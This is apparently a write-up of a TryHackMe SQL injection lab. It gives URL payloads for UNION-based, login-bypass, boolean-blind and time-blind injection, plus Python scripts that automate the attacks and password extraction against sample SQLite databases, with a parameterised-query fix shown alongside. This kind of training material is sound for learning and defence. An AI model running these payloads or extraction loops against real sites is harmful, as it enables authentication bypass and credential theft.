TryHackMe | SQL Injection

Iam_Wander
5 min readMay 10, 2023

--

Learn how to detect and exploit SQL Injection vulnerabilities.

In this practical example, we are presented with a website on which we exploit four kinds of SQL injection:

  1. Error Based SQLi
  2. Blind SQLi
  3. Boolean Based SQLi
  4. Time Based SQLi

Level One. Error Based SQLi

In this room, we are required to discover Martin's password. A visit to the website shows an article page whose content is selected by an id parameter in the URL.

To proceed to the next level, you are required to find the password of the user Martin.

Changing the id value from '1' to another value shows that no results were found, so the parameter is used directly in a database lookup.

Let's proceed to check the number of columns the query returns by appending a UNION SELECT to the id value.

id=1 UNION SELECT 1,2,3;-- 
/* Paste this into the URL right after 'id='. The page loads without an error, which proves the query selects 3 columns (with 1,2 or 1,2,3,4 the UNION fails). Keep the space after '--' (URL-encoded as %20, or written as --+): MySQL only treats '--' followed by whitespace as a comment. */

Next we need to know which database the table belongs to.

0 UNION SELECT 1,2, database();--
/* Use an id that matches no article, such as 0. The original query then returns no rows, so the row produced by the UNION is the only one rendered, and its third column (here database()) shows up where the article text normally goes. */
The database is sqli_one.

Next, let's enumerate the tables in that database using group_concat and information_schema.

id=0 UNION SELECT 1,2,group_concat(table_name) from information_schema.tables WHERE table_schema='sqli_one';--
Bingo! Now we know the database has two tables, article and staff_users.

We are mostly interested in staff_users, so let's proceed to enumerate further.

Let's discover which columns staff_users has.

id=0 UNION SELECT 1,2,group_concat(column_name) from information_schema.columns WHERE table_name='staff_users';--
The table staff_users has 3 columns: id, password and username. In our case, we are interested in the passwords and usernames. (This query is not filtered by table_schema, so if another database on the server also had a table named staff_users its columns would be listed as well; adding AND table_schema='sqli_one' avoids that.)

Let's proceed to disclose the usernames and passwords of the users.

id=0 UNION SELECT 1,2,group_concat(username,':',password) from staff_users;--
group_concat joins every username:password pair into one string, so the whole table fits in the single column the page renders. Now we have Martin's password as pa$$word.

username: Martin, password: pa$$word
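The whole Level One chain, as an added example that is not part of the original room or write-up: a Python script with a constructed in-memory SQLite database standing in for sqli_one (the table contents and credentials are made up here) and a deliberately injectable article lookup. It probes the column count, then uses the id=0 trick to enumerate tables, columns and finally the credentials. SQLite has no information_schema and no multi-argument group_concat, so the equivalents sqlite_master, pragma_table_info() and || are used; the payload shape is otherwise the same as the URL payloads above.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the room's sqli_one database (sample data, not the real room)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO article VALUES (1, 'Welcome', 'first post');
        CREATE TABLE staff_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO staff_users VALUES (1, 'admin', 'p4ssword'), (2, 'Martin', 'pa$$word');
    """)
    return db


def vulnerable_article(db, article_id):
    """The injectable endpoint: the id from the URL is concatenated straight into the query."""
    sql = f"SELECT id, title, body FROM article WHERE id={article_id}"
    return db.execute(sql).fetchall()


def find_column_count(db, max_cols=10):
    """Step 1: grow 'UNION SELECT 1,2,...' until the database accepts it."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        try:
            vulnerable_article(db, f"1 UNION SELECT {cols};--")
            return n
        except sqlite3.OperationalError:
            # 'SELECTs to the left and right of UNION do not have the same number of result columns'
            continue
    return None


def inject(db, select_tail):
    """Steps 2-4: id=0 matches no article, so the UNION row is the only one rendered;
    its third column is where the page would show the article body."""
    rows = vulnerable_article(db, f"0 UNION SELECT 1,2,{select_tail};--")
    return rows[0][2]


def enumerate_tables(db):
    # SQLite equivalent of the page's information_schema.tables query
    return inject(db, "group_concat(name) FROM sqlite_master WHERE type='table'")


def enumerate_columns(db, table):
    # SQLite equivalent of information_schema.columns (pragma_table_info needs SQLite 3.16+)
    return inject(db, f"group_concat(name) FROM pragma_table_info('{table}')")


def dump_credentials(db, table):
    # MySQL's group_concat(username,':',password) is group_concat(username||':'||password) in SQLite
    return inject(db, f"group_concat(username||':'||password) FROM {table}")


def password_of(db, table, user):
    """Parse the dumped username:password list and pick out one user's password."""
    creds = dict(pair.split(":", 1) for pair in dump_credentials(db, table).split(","))
    return creds.get(user)


if __name__ == "__main__":
    db = build_db()
    print("columns:", find_column_count(db))
    print("tables:", enumerate_tables(db))
    print("staff_users columns:", enumerate_columns(db, "staff_users"))
    print("Martin's password:", password_of(db, "staff_users", "Martin"))
```

The column probe relies on the database raising an error for a mismatched UNION; on the real site that error is what you see rendered (or a blank page) until the count is right. Everything after that goes through a single helper because the technique is always the same: make the original query return nothing and let the UNION row carry the answer.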

Conclusion

This type of SQL injection is the most useful for easily obtaining information about the database structure, because the query results and any error messages from the database are printed directly to the browser. Combined with UNION SELECT it can often be used to enumerate a whole database.

Level Two

Blind SQLi

In this level, we are required to bypass the login of the user 'admin' without knowing the password.

A look at the SQL query:

select * from users where username='' and password='' LIMIT 1;

If we know there is a user going by admin, then our SQL query would look like this:

select * from users where username='admin' and password='' LIMIT 1;

But the password is unknown, so we can use the 1=1 method to bypass the login. Entering ' OR 1=1;-- as the password closes the password string, adds a condition that is always true, and comments out the rest of the query:

select * from users where username='admin' and password='' OR 1=1;--' LIMIT 1;

Trying the password as ' OR 1=1;--

gets you direct access as admin. Because AND binds tighter than OR, the WHERE clause is true for every row; LIMIT 1 then returns the first row in the table, which in this room is admin. (If another user came first, you would be logged in as that user instead.)

Hurray! We bypassed the login.
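The bypass and its fix side by side, as an added example that is not part of the original page: a constructed SQLite users table (sample credentials made up here, with admin deliberately as the first row), the room's query built by string concatenation, and the same query with bound parameters. It also shows the catch mentioned above: ' OR 1=1 makes the condition true for every row, so LIMIT 1 hands back whichever user the database lists first, whatever username was typed. The admin'-- payload in the username field is this example's addition for targeting the account directly.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the room's users table; admin is deliberately the first row."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "s3cret"), ("alice", "wonderland")])
    return db


def vulnerable_login(db, username, password):
    """The room's query, built by string concatenation. Returns the username of the row that
    matched (i.e. who you are now logged in as) or None."""
    sql = (f"select * from users where username='{username}' "
           f"and password='{password}' LIMIT 1;")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(db, username, password):
    """Same query with bound parameters: the quote in the payload is data, not SQL syntax."""
    row = db.execute("select * from users where username=? and password=? LIMIT 1",
                     (username, password)).fetchone()
    return row[0] if row else None


BYPASS = "' OR 1=1;--"          # the page's payload, typed into the password field


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, admin +", BYPASS, "->", vulnerable_login(db, "admin", BYPASS))
    # AND binds tighter than OR, so every row matches and LIMIT 1 returns the first one,
    # regardless of the username typed: 'alice' still lands you in the admin account.
    print("vulnerable, alice +", BYPASS, "->", vulnerable_login(db, "alice", BYPASS))
    # Commenting out the password check from the username field targets an account directly.
    print("vulnerable, admin'-- / anything ->", vulnerable_login(db, "admin'-- ", "anything"))
    print("parameterised, admin +", BYPASS, "->", safe_login(db, "admin", BYPASS))
```

With parameters bound, the same payload is compared literally against the stored password and the login fails; no escaping or filtering of quotes is involved, which is why parameterised queries rather than input sanitisation are the standard fix.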

Conclusion

Blind SQL injection in this form is used to bypass authentication methods such as login forms. In this instance, we aren't that interested in retrieving data from the database; we just want to get past the login.

Level Three

Boolean Based Blind SQLi

Boolean-based SQLi is when the only feedback from the application is whether the injected query returned a row: True or False.

In this level, we are presented with a form in which we are required to bypass the login. Entering the value admin in the URL bar returns the value True, because that user exists.

We continue to manipulate the URL bar by entering the value user'. This gives a 'False' response: the stray quote breaks the query, so no row is found.

Now let's try user' UNION SELECT to get the number of columns in this query.

user' UNION SELECT 1,2,3;--
This returns True, which shows the query has 3 columns; with the wrong count the UNION fails and the response stays False. The same True/False answer can now be used to ask yes/no questions, one at a time, by putting the condition in a WHERE clause so that the UNION only produces a row when the condition holds. First, the database name:
user' UNION SELECT 1,2,3 where database() like 'sqli_three%';--

The name is found one character at a time: try like 's%', then 'sq%', and so on, extending the prefix whenever the response is True. Now that we know the database is sqli_three, the next step is to determine the table names in the same way, trying all the letters until you get a 'True' value. In our case, it is 'users':

user' UNION SELECT 1,2,3 from information_schema.tables where table_schema='sqli_three' and table_name like 'users%';--

The table name is users. What columns does it have?

user' UNION SELECT 1,2,3 from information_schema.columns where table_schema='sqli_three' and table_name='users' and column_name like 'username%';--

What do we know? We know the table 'users' has a column 'username' and, by repeating the search, a column 'password'. Let's check for the names stored in the username column.

user' UNION SELECT 1,2,3 from users where username like 'admin%';--

Hurrah! We got a user named admin. Let's enumerate his password.

user' UNION SELECT 1,2,3 from users where username='admin' and password like '3845%';--

We got the password as 3845 (once no extra character extends the prefix, the value is complete). Let's log in. Note that LIKE is case-insensitive by default and treats % and _ as wildcards, so a recovered value that contains letters or those characters should be confirmed with an exact comparison.

Level Four

Time Based Blind SQLi

In this level, we are presented with a login form, but there is no visual indicator of your queries being wrong or right this time. Instead, the indicator of a correct query is the time the query takes to complete. This delay is introduced with built-in methods such as SLEEP(x) alongside the UNION statement. SLEEP() only runs when the UNION SELECT is valid and its WHERE clause matches a row, so a delayed response means 'True'.

If the query is right, we will only see a response after the time we set.

To begin with, let's discover the number of columns with the URL below.

user' UNION SELECT SLEEP(5),2;--

The response takes five seconds, so the query has two columns (with the wrong number of columns the UNION fails and the page returns immediately). Now let's discover which database is in use.

user' UNION SELECT SLEEP(5),2 WHERE database() like'sqli_four%';--

The database is sqli_four.

Let's enumerate further to find the tables in that database.

user' UNION SELECT SLEEP(5),2 from information_schema.tables where table_schema='sqli_four' and table_name like 'users%';--

There is a table named 'users'. Its columns and the admin password are found with the same character-by-character search as in Level Three, using the delay instead of True/False as the indicator.

Try logging in with user 'admin' and password 4961.
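The character-by-character search of Level Three and Level Four automated, as an added example that is not part of the original room or write-up. The constructed in-memory SQLite users table has two columns and made-up credentials (admin/3845, bob/hunter2), so the payloads use UNION SELECT 1,2 and SLEEP(),2 rather than the three-column form of Level Three. SQLite has no SLEEP(), so a Python sleep is registered under that name to make the time-based payload behave as it does in MySQL; the delay is kept short here. Both levels share one extraction loop, which only differs in the oracle it asks: the page's True/False reply for Level Three, elapsed time for Level Four.

```python
import sqlite3
import string
import time

DELAY = 0.05   # seconds SLEEP() pauses when the condition holds (the room uses 5; kept small here)


def build_db():
    """Constructed stand-in for the room's users table (two columns, sample credentials made up)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", [("admin", "3845"), ("bob", "hunter2")])
    # SQLite has no SLEEP(); register one so the time-based payload behaves as in MySQL.
    db.create_function("SLEEP", 1, lambda seconds: time.sleep(seconds) or 0)
    return db


def vulnerable_user_check(db, username):
    """The injectable endpoint: answers True/False depending on whether the query found a row."""
    sql = f"SELECT * FROM users WHERE username='{username}'"
    return db.execute(sql).fetchone() is not None


def boolean_oracle(db, condition):
    """Level Three: the page's True/False reply is the signal."""
    return vulnerable_user_check(db, f"user' UNION SELECT 1,2 FROM users WHERE {condition};--")


def time_oracle(db, condition):
    """Level Four: the reply is ignored; only the delay says whether the condition matched a row."""
    start = time.monotonic()
    vulnerable_user_check(db, f"user' UNION SELECT SLEEP({DELAY}),2 FROM users WHERE {condition};--")
    return time.monotonic() - start >= DELAY / 2


def extract_like(oracle, column, where, charset=string.digits + string.ascii_lowercase, max_len=32):
    """Recover a value one character at a time with LIKE 'known%', the search the page does by hand.
    LIKE is case-insensitive by default and treats % and _ as wildcards, so the charset avoids
    upper-case duplicates, and a value containing % or _ would need an ESCAPE clause."""
    known = ""
    for _ in range(max_len):
        for ch in charset:
            if oracle(f"{where} AND {column} LIKE '{known}{ch}%'"):
                known += ch
                break
        else:
            return known     # no character extends the prefix: the value is complete
    return known


if __name__ == "__main__":
    db = build_db()
    print("boolean:", extract_like(lambda c: boolean_oracle(db, c), "password", "username='admin'"))
    print("time   :", extract_like(lambda c: time_oracle(db, c), "password", "username='admin'"))
```

The time oracle deliberately discards the page's answer and decides on elapsed time alone, which is the only signal available in Level Four; against a real server the threshold has to sit well above normal response jitter, and each True costs a full SLEEP, so a long delay multiplied by a large charset is where these attacks get slow.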
